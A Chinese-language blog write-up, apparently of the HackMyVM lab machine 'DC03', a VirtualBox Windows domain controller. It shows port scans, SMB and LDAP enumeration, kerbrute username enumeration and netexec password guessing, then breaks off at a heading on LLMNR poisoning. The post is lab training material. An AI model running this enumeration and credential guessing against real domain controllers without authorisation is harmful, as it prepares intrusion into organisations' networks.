{"id":865,"date":"2025-06-13T11:32:03","date_gmt":"2025-06-13T03:32:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=865"},"modified":"2025-06-13T11:32:03","modified_gmt":"2025-06-13T03:32:03","slug":"hmv-_-dc03","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/865\/06\/13\/2025\/","title":{"rendered":"hmv[-_-]DC03"},"content":{"rendered":"

DC03<\/h1>\n

\"image-20250610235718818\"<\/div>
\n
\"image-20250613081157301\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.107:389\nOpen 192.168.10.107:445\nOpen 192.168.10.107:464\nOpen 192.168.10.107:53\nOpen 192.168.10.107:88\nOpen 192.168.10.107:135\nOpen 192.168.10.107:139\nOpen 192.168.10.107:593\nOpen 192.168.10.107:636\nOpen 192.168.10.107:3268\nOpen 192.168.10.107:5985\nOpen 192.168.10.107:9389\nOpen 192.168.10.107:49664\nOpen 192.168.10.107:49669\nOpen 192.168.10.107:49670\nOpen 192.168.10.107:49682\nOpen 192.168.10.107:49700\n\nPORT      STATE SERVICE       REASON          VERSION\n53\/tcp    open  domain        syn-ack ttl 128 Simple DNS Plus\n88\/tcp    open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-13 15:15:51Z)\n135\/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds? syn-ack ttl 128\n464\/tcp   open  kpasswd5?     syn-ack ttl 128\n593\/tcp   open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped    syn-ack ttl 128\n3268\/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n5985\/tcp  open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing\n49664\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49669\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49670\/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n49682\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49700\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 14h59m58s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:cb:c3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   SOUPEDECODE<1c>      Flags: <group><active>\n|   DC01<00>             Flags: <unique><active>\n|   SOUPEDECODE<00>      Flags: <group><active>\n|   DC01<20>             Flags: <unique><active>\n|   SOUPEDECODE<1b>      Flags: <unique><active>\n| Statistics:\n|   08:00:27:cb:c3:14:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 12318\/tcp): CLEAN (Timeout)\n|   Check 2 (port 62243\/tcp): CLEAN (Timeout)\n|   Check 3 (port 58595\/udp): CLEAN (Timeout)\n|   Check 4 (port 60390\/udp): CLEAN (Timeout)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| smb2-time: \n|   date: 2025-06-13T15:16:39\n|_  start_date: N\/A<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u654f\u611f\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\n
smb\u670d\u52a1<\/h4>\n
\u53d1\u73b0\u5f00\u542f\u4e86smb<\/code>\u670d\u52a1\uff0c445 \u7aef\u53e3\uff0c\u5c1d\u8bd5\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Thu Jun 12 20:18:54 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.107\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.107 )===========================\n\n[+] Got domain\/workgroup name: SOUPEDECODE\n\n ===============================( Nbtstat Information for 192.168.10.107 )===============================\n\nLooking up status of 192.168.10.107\n        SOUPEDECODE     <1c> - <GROUP> B <ACTIVE>  Domain Controllers\n        DC01            <00> -         B <ACTIVE>  Workstation Service\n        SOUPEDECODE     <00> - <GROUP> B <ACTIVE>  Domain\/Workgroup Name\n        DC01            <20> -         B <ACTIVE>  File Server Service\n        SOUPEDECODE     <1b> -         B <ACTIVE>  Domain Master Browser\n\n        MAC Address = 08-00-27-CB-C3-14\n\n ==================================( Session Check on 192.168.10.107 )==================================\n\n[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.<\/code><\/pre>\n
\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\u5171\u4eab\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ netexec smb $IP -u "" -p "" --shares\nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\: STATUS_ACCESS_DENIED \nSMB         192.168.10.107  445    DC01             [-] Error enumerating shares: Error occurs while reading from remote(104)<\/code><\/pre>\n
LDAP\u670d\u52a1<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nmap -n -sV --script "ldap* and not brute" $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 20:25 EDT\nNmap scan report for 192.168.10.107\nHost is up (0.00068s latency).\nNot shown: 988 filtered tcp ports (no-response)\nPORT     STATE SERVICE       VERSION\n53\/tcp   open  domain        Simple DNS Plus\n88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-13 15:25:33Z)\n135\/tcp  open  msrpc         Microsoft Windows RPC\n139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   <ROOT>\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|       supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 45077\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250613152533.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n445\/tcp  open  microsoft-ds?\n464\/tcp  open  kpasswd5?\n593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   <ROOT>\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|       supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 45077\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250613152533.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n3269\/tcp open  tcpwrapped\n5985\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.11 seconds<\/code><\/pre>\n
\u6dfb\u52a0dns\u89e3\u6790\uff1a<\/p>\n
192.168.10.107   SOUPEDECODE.LOCAL<\/code><\/pre>\n
\u7206\u7834kerberos\u670d\u52a1<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$  ..\/DC02\/kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc 192.168.10.107 \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt \n\n    __             __               __     \n   \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,< \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/                                        \n\nVersion: v1.0.3 (9dad6e1) - 06\/12\/25 - Ronnie Flathers @ropnop\n\n2025\/06\/12 20:30:08 >  Using KDC(s):\n2025\/06\/12 20:30:08 >   192.168.10.107:88\n\n2025\/06\/12 20:30:08 >  [+] VALID USERNAME:       charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:08 >  [+] VALID USERNAME:       Charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:08 >  [+] VALID USERNAME:       administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:13 >  [+] VALID USERNAME:       Administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 20:30:13 >  [+] VALID USERNAME:       CHARLIE@SOUPEDECODE.LOCAL\n2025\/06\/12 20:35:35 >  [+] VALID USERNAME:       wreed11@SOUPEDECODE.LOCAL\n2025\/06\/12 20:49:33 >  [+] VALID USERNAME:       printserver@SOUPEDECODE.LOCAL\n2025\/06\/12 21:01:56 >  [+] VALID USERNAME:       kleo2@SOUPEDECODE.LOCAL\n2025\/06\/12 21:22:45 >  [+] VALID USERNAME:       dc01@SOUPEDECODE.LOCAL\n2025\/06\/12 21:37:29 >  [+] VALID USERNAME:       ChArLiE@SOUPEDECODE.LOCAL\n2025\/06\/12 21:37:34 >  [+] VALID USERNAME:       CHarlie@SOUPEDECODE.LOCAL\n2025\/06\/12 21:39:37 >  Done! Tested 8295455 usernames (11 valid) in 4169.688 seconds<\/code><\/pre>\n
charlie\nadministrtor\nwreed11\nkleo2<\/code><\/pre>\n
\u4f46\u662f\u53d1\u73b0\u6ca1\u6709\u53ef\u4ee5\u7528\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ netexec smb $IP -u user -p user   \nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:administrtor STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:kleo2 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\administrtor:kleo2 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:kleo2 STATUS_LOGON_FAILURE \nSMB         192.168.10.107  445    DC01             [-] SOUPEDECODE.LOCAL\\kleo2:kleo2 STATUS_LOGON_FAILURE<\/code><\/pre>\n
UDP\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u7531\u4e8e\u672a\u53d1\u73b0\u53ef\u5229\u7528\u7684\u70b9\uff0c\u5c1d\u8bd5\u4e00\u4e0budp<\/code>\u4fe1\u606f\u641c\u96c6\uff08\u8fd9\u4e2a\u51fa\u9898\u4eba\u7684\u9898\u76ee\u5f88\u5c11\u6709\u7206\u7834\u7c7b\u7684\uff09<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ sudo nmap -Pn -sU -F $IP --max-rate 50 --min-rate 15\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 20:49 EDT\nNmap scan report for 192.168.10.107\nHost is up (0.0035s latency).\nNot shown: 96 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n137\/udp open  netbios-ns\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 5.41 seconds<\/code><\/pre>\n
ntp \u670d\u52a1<\/h4>\n
\u5f00\u542f\u7684123<\/code>\u7aef\u53e3\u5c31\u662f\u8fd0\u884c\u8fd9\u4e2a\u670d\u52a1\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1ahttps:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ntp.html?highlight=123#hacktricks-automatic-commands<\/a><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ ntpq -c readlist $IP                                                                  \n***Request timed out\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 $IP \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 20:53 EDT\nNmap scan report for 192.168.10.107\nHost is up (0.00073s latency).\n\nPORT    STATE SERVICE VERSION\n123\/udp open  ntp     NTP v3\n| ntp-info: \n|_  receive time stamp: 2025-06-13T15:48:58\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.86 seconds<\/code><\/pre>\n
\u6ca1\u53d1\u73b0\u4e1c\u897f\u3002<\/p>\n
137\/UDP<\/h4>\n
\u8fdb\u884c\u63a2\u6d4b\uff1ahttps:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/137-138-139-pentesting-netbios.html?highlight=137#name-service<\/a><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nmblookup -A $IP\nLooking up status of 192.168.10.107\n        SOUPEDECODE     <00> - <GROUP> B <ACTIVE> \n        DC01            <00> -         B <ACTIVE> \n        SOUPEDECODE     <1c> - <GROUP> B <ACTIVE> \n        DC01            <20> -         B <ACTIVE> \n        SOUPEDECODE     <1b> -         B <ACTIVE> \n\n        MAC Address = 08-00-27-CB-C3-14\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nbtscan $IP\/30\nDoing NBT name scan for addresses from 192.168.10.107\/30\n\nIP address       NetBIOS Name     Server    User             MAC address      \n------------------------------------------------------------------------------\n192.168.10.105   HGBE02           <server>  <unknown>        34:2e:b7:08:3d:a1\n192.168.10.107   DC01             <server>  <unknown>        08:00:27:cb:c3:14<\/code><\/pre>\n
\u6ca1\u5934\u7eea\u554a\u3002\u3002\u3002\u3002\u3002<\/p>\n
LLMNR \u6295\u6bd2<\/h3>\n
\u770b\u5e08\u5085\u4eec\u7684wp\uff0c\u53d1\u73b0\u8fd9\u91cc\u9700\u8981\u5bf9\u9776\u673a\u8fdb\u884c\u4e00\u4e2a\u6d4b\u8bd5\uff0c\u6211\u505a\u7684 windows \u9776\u673a\u786e\u5b9e\u5c11\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ping 192.168.10.107           \nPING 192.168.10.107 (192.168.10.107) 56(84) bytes of data.\n64 bytes from 192.168.10.107: icmp_seq=1 ttl=128 time=0.987 ms\n64 bytes from 192.168.10.107: icmp_seq=2 ttl=128 time=0.662 ms\n64 bytes from 192.168.10.107: icmp_seq=3 ttl=128 time=0.967 ms\n^C\n--- 192.168.10.107 ping statistics ---\n3 packets transmitted, 3 received, 0% packet loss, time 2001ms\nrtt min\/avg\/max\/mdev = 0.662\/0.872\/0.987\/0.148 ms<\/code><\/pre>\n
\u7136\u540e\u53d1\u73b0\uff1a<\/p>\n
